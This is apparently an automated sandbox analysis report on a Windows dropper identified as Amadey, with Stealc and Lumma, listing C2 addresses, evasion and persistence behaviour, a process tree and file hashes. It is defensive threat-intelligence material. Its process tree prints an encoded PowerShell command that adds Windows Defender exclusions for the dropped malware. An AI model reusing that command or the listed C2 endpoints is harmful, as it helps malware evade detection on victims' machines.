Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-11-2024 14:28
Static task
static1
Behavioral task
behavioral1
Sample
b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe
Resource
win7-20241010-en
General
-
Target
b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe
-
Size
1.8MB
-
MD5
d2a8b6cdfaf14a244d67ed5a6d4ef96b
-
SHA1
1e1e724ddbcd0e9a1bef3329fbf7a4bdf678fcd0
-
SHA256
b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8
-
SHA512
3278f33946775cedcaaa92431fc438c638bcf70db47ae5f8096cff3fdabad826d6bc32997ec459dac4d95d1e24ed383803ec5f8e97f8168c1d5d8575cc86a9fe
-
SSDEEP
49152:HrsIs20hN29fIuGt/GU7YyyxviJiUQxJ907xvqM07bLGNH:HrdsFN29fIXGuWxa5MJ9A
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
tale
http://185.215.113.206
-
url_path
/6c4adf523b719729.php
Extracted
lumma
https://founpiuer.store/api
https://navygenerayk.store/api
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4664 created 3432 4664 gdn5yfjd.exe 56 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0ffd919ed1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gdn5yfjd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8fd2b30fa9.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gdn5yfjd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8fd2b30fa9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0ffd919ed1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0ffd919ed1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gdn5yfjd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8fd2b30fa9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation gdn5yfjd.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs gdn5yfjd.exe -
Executes dropped EXE 8 IoCs
pid Process 2740 axplong.exe 4664 gdn5yfjd.exe 3920 18ijuw13.exe 2752 8fd2b30fa9.exe 3328 0ffd919ed1.exe 5352 axplong.exe 5268 18ijuw13.exe 5864 axplong.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 8fd2b30fa9.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 0ffd919ed1.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine axplong.exe -
resource yara_rule behavioral2/files/0x0031000000023b72-33.dat themida behavioral2/memory/4664-64-0x0000000000400000-0x000000000184E000-memory.dmp themida behavioral2/memory/4664-65-0x0000000000400000-0x000000000184E000-memory.dmp themida behavioral2/memory/4664-1376-0x0000000000400000-0x000000000184E000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8fd2b30fa9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1001868001\\8fd2b30fa9.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0ffd919ed1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1001869001\\0ffd919ed1.exe" axplong.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gdn5yfjd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 4880 b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe 2740 axplong.exe 4664 gdn5yfjd.exe 2752 8fd2b30fa9.exe 3328 0ffd919ed1.exe 5352 axplong.exe 5864 axplong.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4664 set thread context of 2320 4664 gdn5yfjd.exe 105 PID 3920 set thread context of 5268 3920 18ijuw13.exe 107 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5476 3920 WerFault.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 18ijuw13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0ffd919ed1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gdn5yfjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fd2b30fa9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 18ijuw13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 4880 b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe 4880 b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe 2740 axplong.exe 2740 axplong.exe 4664 gdn5yfjd.exe 4664 gdn5yfjd.exe 2752 8fd2b30fa9.exe 2752 8fd2b30fa9.exe 3328 0ffd919ed1.exe 3328 0ffd919ed1.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4664 gdn5yfjd.exe 4664 gdn5yfjd.exe 5352 axplong.exe 5352 axplong.exe 5864 axplong.exe 5864 axplong.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4664 gdn5yfjd.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4664 gdn5yfjd.exe Token: SeDebugPrivilege 2320 InstallUtil.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4880 b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 4880 wrote to memory of 2740 4880 b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe 91 PID 4880 wrote to memory of 2740 4880 b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe 91 PID 4880 wrote to memory of 2740 4880 b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe 91 PID 2740 wrote to memory of 4664 2740 axplong.exe 95 PID 2740 wrote to memory of 4664 2740 axplong.exe 95 PID 2740 wrote to memory of 4664 2740 axplong.exe 95 PID 2740 wrote to memory of 3920 2740 axplong.exe 96 PID 2740 wrote to memory of 3920 2740 axplong.exe 96 PID 2740 wrote to memory of 3920 2740 axplong.exe 96 PID 2740 wrote to memory of 2752 2740 axplong.exe 99 PID 2740 wrote to memory of 2752 2740 axplong.exe 99 PID 2740 wrote to memory of 2752 2740 axplong.exe 99 PID 2740 wrote to memory of 3328 2740 axplong.exe 101 PID 2740 wrote to memory of 3328 2740 axplong.exe 101 PID 2740 wrote to memory of 3328 2740 axplong.exe 101 PID 4664 wrote to memory of 4316 4664 gdn5yfjd.exe 103 PID 4664 wrote to memory of 4316 4664 gdn5yfjd.exe 103 PID 4664 wrote to memory of 4316 4664 gdn5yfjd.exe 103 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 4664 wrote to memory of 2320 4664 gdn5yfjd.exe 105 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107 PID 3920 wrote to memory of 5268 3920 18ijuw13.exe 107
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3432
-
C:\Users\Admin\AppData\Local\Temp\b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe"C:\Users\Admin\AppData\Local\Temp\b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\1001791001\gdn5yfjd.exe"C:\Users\Admin\AppData\Local\Temp\1001791001\gdn5yfjd.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMQA3ADkAMQAwADAAMQBcAGcAZABuADUAeQBmAGoAZAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAxADAAMAAxADcAOQAxADAAMAAxAFwAZwBkAG4ANQB5AGYAagBkAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZAAuAGUAeABlAA==5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
-
C:\Users\Admin\AppData\Local\Temp\1001858001\18ijuw13.exe"C:\Users\Admin\AppData\Local\Temp\1001858001\18ijuw13.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Users\Admin\AppData\Local\Temp\1001858001\18ijuw13.exe"C:\Users\Admin\AppData\Local\Temp\1001858001\18ijuw13.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 2525⤵
- Program crash
PID:5476
-
-
-
C:\Users\Admin\AppData\Local\Temp\1001868001\8fd2b30fa9.exe"C:\Users\Admin\AppData\Local\Temp\1001868001\8fd2b30fa9.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\1001869001\0ffd919ed1.exe"C:\Users\Admin\AppData\Local\Temp\1001869001\0ffd919ed1.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3328
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3920 -ip 39201⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5864
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.5MB
MD50143accc4350dcc3d211d0453f0db35c
SHA190a15d873d020b9e89c81c3240835ea939302ead
SHA25676089a25e76533661a8e8712847e024151b6c7b390634edd8cf1968d04917e57
SHA51236d5e9ff52d31f00f494a9f7bb840a0c37f8aaec065e633fdb6a3509745a5c2fdabcc47e6a6779ce9c019aedbc997770f59e10ab24203f17bf3bd1bb976c483f
-
Filesize
1.1MB
MD53a2c6e49a0d1bb24c89fa1e8ef816179
SHA1979d7f7a10fe7b18b83bd29c264cb0ef3ae89192
SHA256cff2711d0f6b9042f0ab03704add240a5eb56d348a1eda1fd90cf435e450897c
SHA512629dc8d614a2439c6945145e687a58e6b4d184546623ec905939eb1bf09abe5520b82b091199b31db4b64491508265553cc4b6ae9602e993701cfc4cbc01e8fe
-
Filesize
2.0MB
MD5ffdbb2444f2d91d386d3d79b2b06ca4c
SHA13a0d1b25b7da4f691f0fbe19b35aa78b4dc02206
SHA256585bd2f3ba3016448044f523a8202aae62ab3fa37b9566f49dd14e4439899258
SHA51223aa8860d1c332f89d635aca6eccb26c01fdeca90b2edc2f54efb62607def54032743b25cb952e72a6571a44d8b90175bb47fd67e9bb85472e3d994be92ce211
-
Filesize
2.8MB
MD567c4acf3589369c83509935e09774962
SHA14c3d056f3b828eb728512a389f90ab1b77454827
SHA256d2ce87889b31d3dc33e8cc5bc06ea5924bb5c9dcd1b55179fd257fea81a65f54
SHA512c8dd74127fdfc16afd511aeb89287974676871c58a7d4ba04283fb9113fc8879ed87281001f88beb4ceb606ba1567bed59370b3bc8ba57f71f075ede92f6170f
-
Filesize
1.8MB
MD5d2a8b6cdfaf14a244d67ed5a6d4ef96b
SHA11e1e724ddbcd0e9a1bef3329fbf7a4bdf678fcd0
SHA256b5801b7b20a9ad7d1acccd19e8dafe93cf131aeed1bc5f2756d6b69048f9dae8
SHA5123278f33946775cedcaaa92431fc438c638bcf70db47ae5f8096cff3fdabad826d6bc32997ec459dac4d95d1e24ed383803ec5f8e97f8168c1d5d8575cc86a9fe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82